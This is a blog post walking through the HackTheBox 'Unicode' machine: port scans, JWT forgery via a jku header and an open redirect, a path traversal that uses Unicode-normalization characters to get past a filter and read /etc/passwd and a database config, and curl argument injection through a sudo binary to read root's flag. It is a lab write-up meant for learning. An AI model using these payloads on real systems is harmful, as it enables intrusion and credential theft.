<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="days ago"><meta name="hour-prompt" content="hours ago"><meta name="minute-prompt" content="minutes ago"><meta name="justnow-prompt" content="just now"><meta name="generator" content="Jekyll v4.2.1" /><meta property="og:title" content="Hackthebox: Unicode" /><meta property="og:locale" content="en" /><meta name="description" content="Unicode is a medium box from hackthebox which starts with exploiting jwt in order to access admin panel and later exploiting a lfi vulnerability to get user credentials. The privesc is done by performing command execution with a binary which have sudo permissions." /><meta property="og:description" content="Unicode is a medium box from hackthebox which starts with exploiting jwt in order to access admin panel and later exploiting a lfi vulnerability to get user credentials. The privesc is done by performing command execution with a binary which have sudo permissions." /><link rel="canonical" href="https://0xj0y.github.io/posts/hackthebox-unicode/" /><meta property="og:url" content="https://0xj0y.github.io/posts/hackthebox-unicode/" /><meta property="og:site_name" content="My Infosec Notes" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-01-15T10:25:15+05:30" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Hackthebox: Unicode" /><meta name="twitter:site" content="@JMukhopdhyay" /><meta name="google-site-verification" content="KUqwixRY5eb7rL_YGhYhwWBfdp3LBmvHKu-6r4z3BNk" /> <script type="application/ld+json"> {"headline":"Hackthebox: Unicode","dateModified":"2022-04-27T12:42:40+05:30","datePublished":"2022-01-15T10:25:15+05:30","description":"Unicode is a medium box from hackthebox which starts with exploiting jwt in order to access admin panel and later exploiting a lfi vulnerability to get user credentials. The privesc is done by performing command execution with a binary which have sudo permissions.","url":"https://0xj0y.github.io/posts/hackthebox-unicode/","mainEntityOfPage":{"@type":"WebPage","@id":"https://0xj0y.github.io/posts/hackthebox-unicode/"},"@type":"BlogPosting","@context":"https://schema.org"}</script><title>Hackthebox: Unicode | My Infosec Notes</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="My Infosec Notes"><meta name="application-name" content="My Infosec Notes"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end" lang="en"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/images/logo.jpeg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">My Infosec Notes</a></div><div class="site-subtitle font-italic">Infosec Writeupas/blogs and notes</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/0xj0y" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/JMukhopdhyay" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['joymkh21','gmail.com'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Hackthebox: Unicode</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <img data-src="../../images/htb_unicode/../../images/htb_unicode/machine_banner.png" class="preview-img bg" alt="featured image" data-proofer-ignore><h1 data-toc-skip>Hackthebox: Unicode</h1><div class="post-meta text-muted"><div> By <em> <a href="https://twitter.com/JMukhopdhyay">Joy Mukhopadhyay</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" date="2022-01-15 10:25:15 +0530" data-toggle="tooltip" data-placement="bottom" title="Sat, Jan 15, 2022, 10:25 AM +0530" >Jan 15</em> </span> <span> Updated <em class="timeago" date="2022-04-27 12:42:40 +0530 " data-toggle="tooltip" data-placement="bottom" title="Wed, Apr 27, 2022, 12:42 PM +0530" >Apr 27</em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1526 words"> <em>8 min</em> read</span></div></div></div><div class="post-content"><p>Unicode is a medium box from hackthebox which starts with exploiting jwt in order to access admin panel and later exploiting a lfi vulnerability to get user credentials. The privesc is done by performing command execution with a binary which have sudo permissions.</p><div class="table-wrapper"><table><thead><tr><th style="text-align: center">machine name<th style="text-align: center">Machine Creator<th style="text-align: center">Points<th style="text-align: center">IP address<th style="text-align: center">Hackthebox link<tbody><tr><td style="text-align: center">Unicode<td style="text-align: center"><a href="https://app.hackthebox.com/users/137089">wh0am1root</a><td style="text-align: center">30<td style="text-align: center">10.10.11.126<td style="text-align: center"><a href="https://app.hackthebox.com/machines/415">Unicode</a></table></div><h3 id="nmap">Nmap<a href="#nmap" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3><p>I started with initial scan to find all the open ports.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre><span class="c"># Nmap 7.92 scan initiated Sun Jan  9 21:32:47 2022 as: nmap -p- -T4 -oN ports.nmap 10.10.11.126</span>
Nmap scan report <span class="k">for </span>10.10.11.126
Host is up <span class="o">(</span>0.081s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65533 closed tcp ports <span class="o">(</span>reset<span class="o">)</span>
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

<span class="c"># Nmap done at Sun Jan  9 21:33:16 2022 -- 1 IP address (1 host up) scanned in 28.83 seconds</span>
</pre></table></code></div></div><p>Then performed detailed nmap scan on the open ports.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="c"># Nmap 7.92 scan initiated Sun Jan  9 21:34:09 2022 as: nmap -p 22,80 -sCV -oN timing.nmap 10.10.11.126</span>
Nmap scan report <span class="k">for </span>10.10.11.126
Host is up <span class="o">(</span>0.080s latency<span class="o">)</span><span class="nb">.</span>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 fd:a0:f7:93:9e:d3:cc:bd:c2:3c:7f:92:35:70:d7:77 <span class="o">(</span>RSA<span class="o">)</span>
|   256 8b:b6:98:2d:fa:00:e5:e2:9c:8f:af:0f:44:99:03:b1 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 c9:89:27:3e:91:cb:51:27:6f:39:89:36:10:41:df:7c <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: 503
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Sun Jan  9 21:34:20 2022 -- 1 IP address (1 host up) scanned in 10.75 seconds</span>
</pre></table></code></div></div><p>According to the detailed nmap scan report the host has only 2 ports open which are 22 and 80. The box has ubuntu running in it. The port 80 has a webserver running which is <code class="language-plaintext highlighter-rouge">nginx</code>.</p><h3 id="website-port-80">Website (Port 80)<a href="#website-port-80" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3><p><img data-src="../../images/htb_unicode/webpage_initial.png" alt="webpage_initial" data-proofer-ignore></p><p>The website has some interesting features which needs to examine closely. Website has login and register feature. Surprisingly they are not any php or html page, they are directories. Also the home page has a button to google about the company. Clicking on the button redirects to <code class="language-plaintext highlighter-rouge">google.com</code>.</p><p><img data-src="../../images/htb_unicode/open-redirect.png" alt="open-redirect" data-proofer-ignore></p><p>This may be open redirect vulnerability but for now it is a dead end.</p><h4 id="directory-bruteforce">Directory bruteforce<a href="#directory-bruteforce" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4><p>When I tried to scan for directories using ffuf or gobuster I was being rate limited by some waf. So bruteforcing directories was not a option anymore.</p><p><img data-src="../../images/htb_unicode/rate_limited.png" alt="../../images/htb_unicode/rate_limited.png" data-proofer-ignore></p><h4 id="dashboard">Dashboard<a href="#dashboard" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4><p>After registreing with a user and loging in I saw the dashboard has feature to upload files. The upload functionality is not exploitable because the destination folder of uploaded files are unknown. Also there is a procong directory where purchasing can be donw but during checkout I saw none of the data being passed to the server</p><p><img data-src="../../images/htb_unicode/purchase-done.png" alt="purchase-done" data-proofer-ignore></p><h4 id="jwt">JWT<a href="#jwt" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4><p><img data-src="../../images/htb_unicode/jwt_burp.png" alt="jwt.burp.png" data-proofer-ignore></p><p>While looking at the requests in burp I noticed jwt is being used as cookie. For a website with barely any functionality presence of jwt as cookie is suspicious so I decoded the token in <a href="https://jwt.io/">jwt.io</a></p><p><img data-src="../../images/htb_unicode/jwt_decoded.png" alt="jwt.decoded.png" data-proofer-ignore></p><p>The jku header in the header section of jwt is called json web key (jwk) url where the jwks.json is stored. <a href="https://hackernoon.com/json-web-tokens-jwt-demystified-f7e202249640">JSON Web Tokens (JWT) Demystified by @heytory</a> is a wonderful article explaining all the things about jwk and jku. In a nutshell during verification of the jwt, a file called <code class="language-plaintext highlighter-rouge">jwks.json</code> is pulled which contains the necessary information which is hosted in website. The location of <code class="language-plaintext highlighter-rouge">jwks.json</code> is specified in the jku header. I retrieved the <code class="language-plaintext highlighter-rouge">jwks.json</code> and it looks like this.</p><div class="language-json highlighter-rouge"><div class="code-header"> <span label-text="JSON"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="p">{</span><span class="w">
  </span><span class="nl">"keys"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
    </span><span class="p">{</span><span class="w">
      </span><span class="nl">"kty"</span><span class="p">:</span><span class="w"> </span><span class="s2">"RSA"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"use"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sig"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"kid"</span><span class="p">:</span><span class="w"> </span><span class="s2">"hackthebox"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"alg"</span><span class="p">:</span><span class="w"> </span><span class="s2">"RS256"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"n"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs"</span><span class="p">,</span><span class="w">
      </span><span class="nl">"e"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AQAB"</span><span class="w">
    </span><span class="p">}</span><span class="w">
  </span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></pre></table></code></div></div><p><a href="https://blog.pentesteracademy.com/hacking-jwt-tokens-jku-claim-misuse-2e732109ac1c">This article</a> explains how this can be exploited to gain admin access. The key is getting supplied from a file which is hosted on the server so if anyone create a forged token with forged key and hosts the <code class="language-plaintext highlighter-rouge">jwks.json</code> in local machine that file will be called during verification. But the above process of exploit didn’t work so I looked of jwk generator online and found this site.</p><p><img data-src="../../images/htb_unicode/mkjwk.png" alt="mkjwk" data-proofer-ignore></p><p>This site created a public-private key pair and corresponding n and e. So I replaced n and e in jwks.json an verified the jwt with new private and public key. Also changed the address of the jku header and pointed it to my ip address and started a python server to host the key.</p><p><img data-src="../../images/htb_unicode/forged_token.png" alt="forged_token" data-proofer-ignore></p><p>But newly forged token wasn’t successful. Because the server maybe looks for <code class="language-plaintext highlighter-rouge">hackmedia.htb</code> at the starting of the address. TO bypass this I took advantage of the open redirect vulnerability which I discovered initially. I backtracked one directory to get into <code class="language-plaintext highlighter-rouge">/redirect</code> and redirect the request to my ip address where I hosted forged jwks.</p><p><img data-src="../../images/htb_unicode/forged_token_stage2.png" alt="forged_token_stage2" data-proofer-ignore></p><p>This time the token worked and I got admin access.</p><h4 id="admin-panel">Admin panel<a href="#admin-panel" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4><p>The admin panel has a lfi vulnerability. The endpoint <code class="language-plaintext highlighter-rouge">/display/?page=quarterly.pdf</code> takes a argument for <code class="language-plaintext highlighter-rouge">page</code> parameter sends a get request. This lead to lfi.</p><p><img data-src="../../images/htb_unicode/lfi_maybe.png" alt="lfi_maybe" data-proofer-ignore></p><p>But lfi was immediately not a success because there is a waf blocking the <code class="language-plaintext highlighter-rouge">../</code>.</p><p><img data-src="../../images/htb_unicode/input_filtering.png" alt="input_filtering" data-proofer-ignore></p><h4 id="unicode-normalization">Unicode Normalization<a href="#unicode-normalization" class="anchor"><i class="fas fa-hashtag"></i></a></h4></h4><p>As the name of the box suggests, the key to bypass the filter is <code class="language-plaintext highlighter-rouge">unicode</code>. During the researching I came across a term called <a href="https://en.wikipedia.org/wiki/Unicode_equivalence"><code class="language-plaintext highlighter-rouge">unicode equivalence</code></a>. When 2 or more differently looking or similar looking character essentially represents the same character. During this another term came up that is <code class="language-plaintext highlighter-rouge">unicode normalization</code>. Unicode normalization process helps to reduce this equivalence to one single character so it makes machines to easily understand. This <a href="https://towardsdatascience.com/what-on-earth-is-unicode-normalization-56c005c55ad0">article</a> explains <code class="language-plaintext highlighter-rouge">unicode normalization</code> beautifully. As two different looking characters can represent same and they can be reduced to normal one after normalization process this, it can be useful to bypass any filter that blocks <code class="language-plaintext highlighter-rouge">../</code>. This <a href="https://jlajara.gitlab.io/web/2020/02/19/Bypass_WAF_Unicode.html">blog</a> has some useful payloads to test this.</p><p><img data-src="../../images/htb_unicode/lfi-stage1.png" alt="../../images/htb_unicode/lfi-stage1.png" data-proofer-ignore></p><p>I replaced <code class="language-plaintext highlighter-rouge">../../../etc/passwd</code> with <code class="language-plaintext highlighter-rouge">︰/︰/︰/etc/passwd</code> and got 404 error. That was a good news because it wasn’t getting blocked anymore. So I kept increasing <code class="language-plaintext highlighter-rouge">︰/</code> and got result shortly.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

...[snap]...

lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
code:x:1000:1000:,,,:/home/code:/bin/bash
</pre></table></code></div></div><p>From <code class="language-plaintext highlighter-rouge">passwd</code> file the host has only one user named <code class="language-plaintext highlighter-rouge">code</code>.</p><h3 id="user-shell">User shell<a href="#user-shell" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3><p>Though I found access.log and error.log I failed to get any shell by log poisoning. So I looked for other important files of nginx and found the folder name where the source code of site is stored in <code class="language-plaintext highlighter-rouge">/etc/nginx/sites-available/default</code>.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>limit_req_zone <span class="nv">$binary_remote_addr</span> <span class="nv">zone</span><span class="o">=</span>mylimit:10m <span class="nv">rate</span><span class="o">=</span>800r/s<span class="p">;</span>

server<span class="o">{</span>
<span class="c">#Change the Webroot from /home/code/app/ to /var/www/html/</span>
<span class="c">#change the user password from db.yaml</span>
  listen 80<span class="p">;</span>
  error_page 503 /rate-limited/<span class="p">;</span>
  location / <span class="o">{</span>
                limit_req <span class="nv">zone</span><span class="o">=</span>mylimit<span class="p">;</span>
    proxy_pass http://localhost:8000<span class="p">;</span>
    include /etc/nginx/proxy_params<span class="p">;</span>
    proxy_redirect off<span class="p">;</span>
  <span class="o">}</span>
  location /static/<span class="o">{</span>
    <span class="nb">alias</span> /home/code/coder/static/styles/<span class="p">;</span>
  <span class="o">}</span>
<span class="o">}</span>
</pre></table></code></div></div><p>It says that the source code is stored in <code class="language-plaintext highlighter-rouge">/home/code/coder</code>. It is also possible that the folder contains any database config file. So I searched for <code class="language-plaintext highlighter-rouge">db.php</code> and didn’t find anything. So I searched popular configuration file extensions and tried appending them with <code class="language-plaintext highlighter-rouge">db</code>. After little exploring I found <code class="language-plaintext highlighter-rouge">db.yaml</code> in the source folder.</p><div class="language-yaml highlighter-rouge"><div class="code-header"> <span label-text="YAML"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre><span class="na">mysql_host</span><span class="pi">:</span> <span class="s2">"</span><span class="s">localhost"</span>
<span class="na">mysql_user</span><span class="pi">:</span> <span class="s2">"</span><span class="s">code"</span>
<span class="na">mysql_password</span><span class="pi">:</span> <span class="s">REDACTED</span>
<span class="na">mysql_db</span><span class="pi">:</span> <span class="s2">"</span><span class="s">user"</span>
</pre></table></code></div></div><p>The yaml file has credentials for <code class="language-plaintext highlighter-rouge">code</code>. I tried to login with ssh and successfully logged in.</p><h3 id="privesc">Privesc<a href="#privesc" class="anchor"><i class="fas fa-hashtag"></i></a></h3></h3><p>First I tried <code class="language-plaintext highlighter-rouge">sudo -l</code> and it showed that user code can run <code class="language-plaintext highlighter-rouge">/usr/bin/treport</code> binary with root permissions.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>code@code:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>code on code:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User code may run the following commands on code:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/treport
</pre></table></code></div></div><p>This has <code class="language-plaintext highlighter-rouge">secure_path</code> set so <code class="language-plaintext highlighter-rouge">PATH</code> variable manipulation is not possible. I executed the binary and it looked like a console where user can read and write threat reports. Also it has provisions to download reports from remote host. I started a python server in my machine to see how binary reacts when it is asked to connect to remote hosts.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>code@code:~<span class="nv">$ </span><span class="nb">sudo</span> /usr/bin/treport 
1.Create Threat Report.
2.Read Threat Report.
3.Download A Threat Report.
4.Quit.
Enter your choice:3
Enter the IP/file_name:10.10.14.36/test
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 <span class="nt">--</span>:--:--  0:00:01 <span class="nt">--</span>:--:--     0
curl: <span class="o">(</span>52<span class="o">)</span> Empty reply from server
</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="code-header"> <span label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>┌──<span class="o">(</span>root💀kali<span class="o">)</span>-[~/HTB/unicode]
└─# nc <span class="nt">-lvnp</span> 80            
listening on <span class="o">[</span>any] 80 ...
connect to <span class="o">[</span>10.10.14.36] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.126] 34860
GET /test HTTP/1.1
Host: 10.10.14.36
User-Agent: curl/7.68.0
Accept: <span class="k">*</span>/<span class="k">*</span>
</pre></table></code></div></div><p>The user agent here is curl. It is clear that the machine performs a curl command to download reports. This can be useful to get command executions. So I tried with different command execution payloads but none of them worked. It looked like a script is filtering out any special characters that is present in user input.</p><p><img data-src="../../images/htb_unicode/Not-allowed.png" alt="Not-allowed" data-proofer-ignore></p><p>But <code class="language-plaintext highlighter-rouge">{}</code> didn’t get blocked. So I created an array of arguments like <code class="language-plaintext highlighter-rouge">{--config,/root/root.txt}</code>. This payload will force curl to read config file which is <code class="language-plaintext highlighter-rouge">root.txt</code> in this payload and it will give output of root flag as stderr.</p><p><img data-src="../../images/htb_unicode/root.png" alt="root" data-proofer-ignore></p><p>And there is root flag and his makes successful solve of <code class="language-plaintext highlighter-rouge">unicode</code> box.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox-writeups/'>Hackthebox Writeups</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hackthebox/" class="post-tag no-text-decoration" >hackthebox</a> <a href="/tags/unicode-normalization/" class="post-tag no-text-decoration" >unicode-normalization</a> <a href="/tags/open-redirect/" class="post-tag no-text-decoration" >open-redirect</a> <a href="/tags/lfi/" class="post-tag no-text-decoration" >lfi</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hackthebox: Unicode - My Infosec Notes&url=https://0xj0y.github.io/posts/hackthebox-unicode/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hackthebox: Unicode - My Infosec Notes&u=https://0xj0y.github.io/posts/hackthebox-unicode/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Hackthebox: Unicode - My Infosec Notes&url=https://0xj0y.github.io/posts/hackthebox-unicode/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i 